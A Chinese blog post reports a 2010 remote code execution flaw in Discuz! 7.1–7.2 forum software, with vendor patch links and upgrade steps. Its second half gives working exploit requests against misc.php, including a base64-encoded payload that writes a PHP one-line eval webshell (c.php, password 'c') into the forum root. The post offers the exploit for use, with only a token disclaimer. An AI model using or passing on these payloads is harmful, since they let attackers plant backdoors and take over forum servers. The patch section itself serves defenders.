Discuz!7.1-7.2 高危漏洞(附利用程序)

By | 2010年1月11日

著名开源论坛程序Discuz!于昨晚再爆高危漏洞
据了解,昨日晚些时候,国内T00ls安全组织的核心成员oldjun,xhming等人发现了Discuz!最新版本的高危漏洞,该漏洞可导致直接获得服务器WEBSHELL(一种以web形式控制服务器的方式),目前使用Discuz!7.2版本的站点不在少数,Discuz!官方已发布更新补丁,请各大论坛站长更新.

解决方案:
  下载并安装软件厂商提供的补丁程序,具体过程如下:
  1. 根据软件版本下载相应补丁包
   7.1 用户 http://download2.comsenz.com/Discuz/patch/7.1/D710_UPGRADE_TO_20100110.zip
   7.2 用户 http://download2.comsenz.com/Discuz/patch/7.2/D720_UPGRADE_TO_20100110.zip
  2. 解压缩文件
  3. 上传upload目录中的所有文件到论坛, 覆盖原有程序
  4. 修复完成

参考信息:
http://www.discuz.net/thread-1537673-1-1.html

 

oldjun漏洞利用代码(请勿用于非法用途)

注册一个用户登陆,然后提交
 

 

 


  1. misc.php?action=imme_binding&response
  2. [result]=1:2&scriptlang[1][2]={${phpinfo()}} 


利用exp


提交 


 


  1. misc.php?action=imme_binding&response
  2. [result]=aa:b&scriptlang[aa][b]
  3. ={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode
  4. (PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}} 


在论坛根目录生成一个c.php 的一句话木马 cnmoker.org


连接密码为c

 

3 thoughts on “Discuz!7.1-7.2 高危漏洞(附利用程序)

发表评论

电子邮件地址不会被公开。 必填项已用*标注